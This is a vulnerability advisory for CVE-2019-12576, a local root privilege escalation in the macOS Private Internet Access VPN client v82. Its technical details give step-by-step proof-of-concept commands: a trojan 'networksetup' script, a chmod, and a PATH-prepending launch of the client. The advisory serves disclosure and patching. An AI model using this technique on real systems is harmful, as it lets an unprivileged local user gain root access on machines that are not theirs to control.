ASA-2019-00382 – London Trust Media Private Internet Access: Untrusted Search Path

Posted on by Allele Security Intelligence in Alerts

Allele Security Alert

ASA-2019-00382

Identifier(s)

ASA-2019-00382, CVE-2019-12576

Title

Untrusted Search Path

Vendor(s)

London Trust Media

Product(s)

Private Internet Access (PIA) VPN Client

Affected version(s)

Private Internet Access (PIA) VPN Client for macOS v82

Fixed version(s)

Private Internet Access (PIA) VPN Client for macOS v1.2.1+

Proof of concept

Yes

Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for macOS could allow an authenticated, local attacker to run arbitrary code with elevated privileges.

Technical details

The PIA macOS openvpn_launcher binary is setuid root. This program is called during the connection process and executes several operating system utilities to configure the system. The networksetup utility is called using relative paths. A local unprivileged user can execute arbitrary commands as root by creating a networksetup trojan which will be executed during the connection process. This is possible because the PATH environment is not reset prior to executing the OS utility.

All steps are executed as a low privileged user.

Step 1 – Create a script named networksetup with the following two lines. This PoC will send the output of the id command to wall. This will show that its running with root privileges(uid=0).

#!/bin/sh
echo "$0: $(/usr/bin/id)"|/usr/bin/wall

Step 2 – Make the networksetup script executable.

chmod 755 networksetup

Step 3 – Execute run.sh to open the PIA GUI client while prepending the current working directory($PWD) to the PATH environment variable. This ensures that the trojan networksetup script is executed first because relative paths are used.

env "PATH=$PWD:$PATH" /Applications/Private\ Internet\ Access.app/Contents/MacOS/run.sh

Step 4 – Login and connect to the VPN

During the connection process networksetup will be executed as root and see a wall message will be broadcasted showing the output of id command with uid=0.

Credits

Rich Mirch

Reference(s)

PIA macOS Privilege Escalation: Untrusted Search Path
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12576.txt

CVE-2019-12576
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12576

CVE-2019-12576
https://nvd.nist.gov/vuln/detail/CVE-2019-12576

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: June 25, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.